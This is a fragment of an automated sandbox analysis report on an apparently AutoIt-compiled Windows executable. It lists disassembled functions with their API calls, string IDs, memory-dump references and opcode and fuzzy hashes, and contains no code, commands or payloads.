                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                    • String ID: ($,$tooltips_class32
                                                    • API String ID: 225202481-3320066284
                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                    Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                    Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                    • String ID: @$AutoIt v3 GUI
                                                    • API String ID: 867697134-3359773793
                                                    • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                    • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                    Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1503153545-1459072770
                                                    • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                    • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                    Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$__wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                    • API String ID: 790654849-32604322
                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                    Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                    • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                    Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                    • _fseek.LIBCMT ref: 00452B3B
                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                    • _wcscat.LIBCMT ref: 00452C07
                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                    • String ID:
                                                    • API String ID: 2054058615-0
                                                    • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                    • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                    Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0
                                                    • API String ID: 2353593579-4108050209
                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                    Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                    • String ID:
                                                    • API String ID: 1744303182-0
                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                    Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                    • __mtterm.LIBCMT ref: 00417C34
                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 4163708885-3819984048
                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                    Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                    • API String ID: 0-1896584978
                                                    • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                    • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                    Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2485277191-404129466
                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                    Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
